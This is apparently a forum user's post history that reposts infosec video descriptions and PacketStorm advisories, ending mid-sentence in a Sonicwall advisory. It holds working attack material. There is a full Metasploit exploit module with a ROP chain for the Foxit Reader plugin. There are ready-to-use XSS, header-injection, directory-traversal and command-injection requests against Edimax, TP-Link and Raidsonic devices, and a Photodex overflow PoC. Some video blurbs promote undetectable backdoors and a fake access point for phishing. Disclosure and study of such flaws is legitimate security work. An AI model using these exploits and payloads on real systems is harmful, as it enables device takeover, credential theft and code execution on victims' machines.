Praetorian503
Active Members-
Posts
578 -
Joined
-
Last visited
-
Days Won
5
Everything posted by Praetorian503
-
Description: What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture? We will then look at the SOMAP.org project which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right. Adrian Wiesmann held this talk at the DeepSec 2011 conference. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: IT Security Compliance Management can be done right (and makes sense when done right) on Vimeo Source: It Security Compliance Management Can Be Done Right (And Makes Sense When Done Right)
-
Description: The talk aims to provide an introduction into the Windows Phone 7 (WP7) security model to allow security professionals and application developers understand the unique platform security features offered. Currently very little public information is available about Windows Phone 7 OS security preventing adequate determination of the risk exposed by WP7 devices. The ever increasing challenges and stages of exploitation an attacker has to overcome to achieve full compromise will be discussed. The talk will outline the implementation of these security features and will demonstrate weaknesses and vulnerabilities an attacker could use to bypass the multiple levels of platform security. A number of OEM manufacturer weaknesses, "features?" will be discussed and a demonstration of how these "features" can be abused in conjunction with conventional exploits to achieve full compromise of the phone will be performed. The talk will demonstrate how OEM phone manufacturers can weaken the security posture of an otherwise strong granular security model and also demonstrate how targeted attacks can be made which leverage this OEM "functionality" to compromise sensitive information. Alex Plaskett held this talk at the DeepSec 2011 security conference. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Windows Pwn 7 OEM - Owned Every Mobile? on Vimeo Source: Windows Pwn 7 Oem - Owned Every Mobile?
-
Description: In this video I will show you how analysis SilentBanker Malware Memory using Volatility Framework. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Volatility Silentbanker Malware Analysis
-
Description: In this video I will show you how to create a persistence backdoor using Metasploit meterpreter – this is very old trick but still useful for maintaining access on a system using an AB script. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Metasploit - Persistence Backdoor
-
A memory corruption vulnerability has been identified in Photodex ProShow Producer version 5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system. Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Improper Restriction of Operations within the Bounds of a Memory Buffer[CWE-119] Date found: 2013-02-14 Date published: 2013-02-14 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Photodex ProShow Producer v5.0.3297, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A memory corruption vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system. Vulnerable function definition (all.dnt): __stdcall ColorPickerProc(x, x, x, x) An attacker needs to force the victim to open a crafted .pxs file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in denial-of-service conditions. 5. PROOF-OF-CONCEPT (Code / Exploit) ------------------------------------ The following generated string has to be inserted into a .pxs file to trigger the vulnerability on Windows XP SP3. #!/usr/bin/python file="poc.txt" junk1="\x41" * 233 eip="\x42" * 4 junk2="\xCC" * 100 poc=junk1 + eip + junk2 try: print ("[*] Creating exploit file...\n"); writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print ("[*] File successfully created!"); except: print ("[!] Error while creating file!"); For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/46 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2013-02-14: Discovery of the vulnerability 2013-02-14: Full Disclosure because the vendor ignored all previous reports. 8. REFERENCES ------------- http://security.inshell.net/advisory/46 Source: PacketStorm
-
The Edimax EW-7206APg and EW-7209APg suffer from cross site scripting, HTTP header injection, and open redirection vulnerabilities. Device Name: EW-7206APg / EW-7209APg Vendor: Edimax ============ Vulnerable Firmware Releases: ============ Device: EW-7206APg Hardware Version Rev. A Runtime Code Version v1.32 Runtime Code Version V1.33 Device: EW-7209APg Hardware Version Rev. A Runtime Code Version 1.21 Runtime Code Version 1.29 ============ Device Description: ============ Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b wireless LAN, this wireless LAN access point can let your wireless LAN client stations access both the wired and the wireless network nodes. EW-7206APg: http://www.edimax.com/en/produce_detail.php?pl1_id=25&pl2_id=134&pl3_id=359&pd_id=18 EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1 ============ Vulnerability Overview: ============ * URL Redirection: Parameter: submit-url and wlan_url http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd * reflected XSS: Parameter: submit-url and wlan-url Injecting scripts into the parameter submit-url or wlan-url reveals that this parameter is not properly validated for malicious input. Example Exploit: http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test><script>alert('XSSed')</script>test * stored XSS * in System Utility -> Domain Name: => parameter: DomainName Injecting scripts into the parameter DomainName reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName="><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged= * Stored XSS in wireless settings / basic settings -> ESSID -> The injected script code gets executed within the device information Injecting scripts into the parameter ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. Example Request: POST /goform/formWlanSetup HTTP/1.1 Host: 192.168.178.175 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.175/wlbasic.asp Authorization: Basic xxx Content-Type: application/x-www-form-urlencoded Content-Length: 351 apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=50&y=20&wlan-url=%2Fwlbasic.asp * HTTP Header Injection: Parameter: submit-url Injecting code into the parameter submit-url mode reveals that this parameter is not properly validated for malicious input and so it is possible to manipulate the header information. http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND Response: HTTP/1.0 302 Redirect Server: GoAhead-Webs Date: Sat Jan 1 14:06:23 2000 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://192.168.178.175/e82f5 New Header: PWND <snip> ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-009 Twitter: @s3cur1ty_de ============ Time Line: ============ September 2012 - discovered vulnerability 21.09.2012 - contacted vendor with vulnerability details 24.09.2012 - vendor responded that they will not provide a fix 14.02.2013 - public disclosure ===================== Advisory end ===================== Source: PacketStorm
-
The TP-Link TL-WA701N and TL-WA701ND suffer from stored cross site scripting and directory traversal vulnerabilities. Device Name: TL-WA701N / TL-WA701ND Vendor: TP-Link ============ Vulnerable Firmware Releases: ============ Firmware Version: 3.12.6 Build 110210 Rel.37112n Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012 Hardware Version: WA701N v1 00000000 Model No.: TL-WA701N / TL-WA701ND Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1 ============ Vulnerability Overview: ============ * Directory Traversal: Access local files of the device. For example you could read /etc/passwd and /etc/shadow. Request: GET /help/../../etc/passwd HTTP/1.1 Host: 192.168.178.2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.2/help/ ==>> no authentication needed!!! Response: HTTP/1.1 200 OK Server: TP-LINK Router Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WA701N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.178.2";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:x:0:0:root:/root:/bin/sh Admin:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ap71:x:500:0:Linux User,,,:/root:/bin/sh Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save * Stored XSS: Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc) Example Request: http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/ * Stored XSS: -> System Tools -> SNMP: Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-011 Twitter: @s3cur1ty_de The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/ ============ Time Line: ============ August 2012 - discovered vulnerability 06.08.2012 - reported vulnerability to TP-Link 14.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
-
Description: In this video Jeremy Druin Talking about SQL Server hacking tricks and advanced exploitation techniques. He will cover topics like. Database Exploitation/Post Exploitation Recon: Detecting SQL Server (Passive) Scanning: Detecting SQL Server (Active) Browsing SQL Server SQL Injection etc .. More Information : - SQL Server Hacking from ISSA Kentuckiana workshop 7 - Jeremy Druin (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sql Server Hacking
-
Description: Forensic Timeline Analysis is to put together actions and events sequentially and chronologically. Construction and presentation of timelines has become critical investigative method to solve complex issues. To a great extent Timeline Analysis is a bit complicated technique to understand, and digital environment has different and unique challenges. Timestamps can be found in various time formats and they are presented or stored with various interpretations. Timeline building techniques are getting evolved and have changed the way an analyst can approach to the cases. With this discussion we will take a deep dive through details about timeline basics through role of timeline analysis in solving cases such as USB Device Activities, Intrusion/Malware analysis and Intellectual property theft artifacts etc. During the session we will discuss about methodologies on how to start building a timeline and the Granular Approach vs Kitchen Sink. Timeline Analysis includes methods using easily accessible tools and frameworks. Using this technique we gain much more information that cannot be obtained with Traditional techniques such as only MAC (Modified, Access, and Change) times from a file system. To achieve the goal we will take a deep dive into timestamps associated with · Web Server such as Apache/IIS · Browser Activity such as IE History/Chrome/Firefox · Windows Event Timestamps, Generic Linux Logs · Windows Registry, Prefecth, Recycle bin, Restore Points · Windows Shortcuts (.lnk) · USB Device Activity · PDF, Office Files Metadata Timestamps · Flash Cookies or Adobe Local Shared Objects · Live Memory Timestamps · Antivirus, ISA log, Firewall timestamps · Squid Proxy · Network Packet Dumps Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Nullcon Delhi 2012: Forensics Timeline Analysis - By Ashish Kunte
-
Description: In this video Jeremy Druin talking about Burp-suite proxy usage - how to configure and how to launch a basics attacks. Using Burp-Suite Proxy - He will cover most of all good features of Burp-suites like Sequencer, Repeater, Intruder, and Decoder etc. .. For setting up your environment use Mutillidae or DVWA. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Mutillidae: Introduction To Installing, Configuring, And Using Burp-Suite Proxy
-
Ultra Light Forum suffers from a persistent cross site scripting vulnerability. # Ultra Light Forum Persistant XSS Vulnerability # By cr4wl3r http://bastardlabs.info # http://bastardlabs.info/advisories/?id=86 # Script: http://sourceforge.net/projects/ultralightforum/files/ # Tested: Win 7 Description : Ultra Light Forum developed in PHP and MySQL as a standalone forum with high speed, high user-friendliness. User can create, delete topic, can reply to others topic. The forum also comes with poll, where user can vote. To know more try UL Forum. Proof of Concept : Choose profile settings, and put the messages box with <script>alert(document.cookie)</script> And update your profile So if any user can view you profile, the script will be execute Demo: http://bastardlabs.info/demo/ultraforum1.png http://bastardlabs.info/demo/ultraforum2.png Source: PacketStorm
-
Raidsonic versions IB-NAS5220 and IB-NAS4220-B suffer from authentication bypass and persistent cross site scripting vulnerabilities. Device Name: IB-NAS5220 / IB-NAS4220-B Vendor: Raidsonic ============ Vulnerable Firmware Releases: ============ Product Name IB-NAS5220 / IB-NAS4220-B Tested Firmware IB5220: 2.6.3-20100206S Tested Firmware IB4220: 2.6.3.IB.1.RS.1 Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip ============ Vulnerability Overview: ============ * Authentication Bypass: -> Access the following URL to bypass the login procedure: http://<IP>/nav.cgi?foldName=adm&localePreference=en * Stored XSS: System -> Time Settings -> NTP Server -> User Define Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. Example Exploit: POST /cgi/time/timeHandler.cgi HTTP/1.1 Host: 192.168.178.41 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.41/cgi/time/time.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 186 month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-010 Twitter: @s3cur1ty_de ============ Time Line: ============ August 2012 - discovered vulnerability 27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B 28.08.2012 - vendor responded that they will not publish an update 15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220 15.10.2012 - vendor responded that they will not publish an update 12.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
-
Description: In this video Jeremy Druin talking about Basic Usage of SQLmap and this video is part of ISSA KY Workshop. this video will cover sqlmap usage - Automated Sql-injection auditing, enumerate the database account, databases, schema, tables, columns and password hashes etc .. Must watch if you are interested in sqlmap tool. For setting up your environment use Mutillidae or DVWA. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Basics Of Using Sqlmap - Issa Ky Workshop
-
Description: In this video you will learn how to Bypass Freesshd Authentication using Metasploit Framework - for exploiting this vulnerability you need only username - which defaults to root. Affected Version : - Freesshd version 1.2.6 and prior More Information : - CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Cve-2012-6066 Freesshd Authentication Bypass Metasploit Demo
-
Description: This video is all about VMWare OVF Tool format String Vulnerability and exploiting that vulnerability using Metasploit. This Vulnerability Discovered and reported by Jeremy Brown - Microsoft. Affected Versions are: VMware OVF Tool 2.1 and previous for Windows VMware Workstation 8.0.5 and previous for Windows VMware Player 4.0.4 and previous for Windows More Information : - CVE-2012-3569 VMWare OVF Tool Vulnerability Metasploit Demo Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Cve-2012-3569 Vmware Ovf Tools Format String Vulnerability Metasploit Demo
-
Description: In this demo I will show you how to create a fake ap for stealing passwords and how to use social engineering toolkit for creating a fake webpage for phishing. Here Social-engineering toolkit is a very useful tool for creating a fake page and ones he enter the password it will auto redirect to main page so maybe victim will think that I have entered wrong password. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Fake Ap – Compromise Passwords Using Set.
-
Description: Create an Executable Backdoor using PowerShell Script. In this video I will show you how to create a backdoor using PowerShell script. Before you start you need PowerGUI Script Editor for converting PowerShell Script into an exe and this exe fully undetectable - of course. Now create your own script for exploitation or use Social-Engineering toolkit for PowerShell script use reverse shell script for this demo. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Create An Executable Backdoor Using Powershell Script.
-
Mersi, aveam nevoie de ceva mai concret. E timpu' sa ma pun pe invatat.
-
This Metasploit module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML Rank = NormalRanking def initialize(info={}) super(update_info(info, 'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod <rgod[at]autistici.org>', # initial discovery and poc 'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ [ 'OSVDB', '89030' ], [ 'BID', '57174' ], [ 'EDB', '23944' ], [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ], [ 'URL', 'http://secunia.com/advisories/51733/' ] ], 'Payload' => { 'Space' => 2000, 'DisableNops' => true }, 'DefaultOptions' => { 'EXITFUNC' => "process", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # npFoxitReaderPlugin.dll version 2.2.1.530 [ 'Automatic', {} ], [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281', { 'Offset' => 272, 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin 'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin :rop => :win7_rop_chain } ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 7 2013", 'DefaultTarget' => 0)) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || '' case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end if os_name == 'Windows 7' and firefox =~ /18/ return targets[1] end return nil end def junk return rand_text_alpha(4).unpack("L")[0].to_i end def nops make_nops(4).unpack("N*") end # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] 0x41414141, # Filler (RETN offset compensation) 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00001000, # 0x00001000-> edx 0x1000d9ec, # XOR EDX, EDX # RETN 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] junk, 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] junk, junk, junk, 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00000001, # 0x00000001-> ebx 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] nops, 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] ].flatten.pack("V*") return rop_gadgets end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end unless self.respond_to?(my_target[:rop]) print_error("Invalid target specified: no callback function defined") send_not_found(cli) return end return if ((p = regenerate_payload(cli)) == nil) # we use two responses: # one for an HTTP 301 redirect and sending the payload # and one for sending the HTTP 200 OK with appropriate Content-Type if request.resource =~ /\.pdf$/ # sending Content-Type resp = create_response(200, "OK") resp.body = "" resp['Content-Type'] = 'application/pdf' resp['Content-Length'] = rand_text_numeric(3,"0") cli.send_response(resp) return else resp = create_response(301, "Moved Permanently") resp.body = "" my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] if datastore['SSL'] schema = "https" else schema = "http" end sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length) sploit << [my_target.ret].pack("V") # EIP sploit << [my_target['WritableAddress']].pack("V") # Writable Address sploit << self.send(my_target[:rop]) sploit << p.encoded resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all') cli.send_response(resp) # handle the payload handler(cli) end end end Source: PacketStorm
-
Sonicwall OEM Scrutinizer version 9.5.2 suffers from multiple persistent script insertion vulnerabilities that can allow for cross site scripting. Title: ====== Sonicwall OEM Scrutinizer v9.5.2 - Multiple Web Vulnerabilities Date: ===== 2013-02-14 References: =========== http://www.vulnerability-lab.com/get_content.php?id=786 VL-ID: ===== 786 Common Vulnerability Scoring System: ==================================== 5.2 Introduction: ============= Dell™ SonicWALL™ Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: ================ 2012-12-05: Researcher Notification & Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== Multiple persistent input validation vulnerabilities are detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bugs allows remote attackers to implement/inject malicious script code on the application side (persistent). The first persistent vulnerability is located in the Alarm - New Board & Policy Manager module with the bound vulnerable Search item - BBSearchText parameter request. The vulnerability allows to inject persistent script code as search item value. The result is the persistent execution of script code out of the BBSearchText listing. The secound persistent vulnerability is located in the Dashboard - Flow Expert module with the bound vulnerable Mytab parameter. The vulnerability allows to inject persistent script code as myTab link value. The result is the persistent execution of script code out of the Mytab link listing. The 3rd persistent vulnerability is located in the MyView (CGI) module with the bound vulnerable `newName` parameter request. The vulnerability allows to inject persistent script code as newName. The result is the persistent execution of script code out of the core value listing. The 4th persistent vulnerability is located in the Admin > Admin [New Users & New Group] module with the bound vulnerable groupName & username parameters. The vulnerability allows to inject persistent script code as username or groupname. The result is the persistent execution of script code out of all username and group listings + checkboxes. The 5th persistent vulnerability is located in the Admin > Admin [Mapping / Maps (CGI) - Dashboard Status] module with the bound vulnerable groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) parameters. The vulnerability allows to inject persistent script code as groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) value(s). The result is the persistent execution of script code out of the groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name listings and settings groups checkbox. The 6th persistent vulnerability is 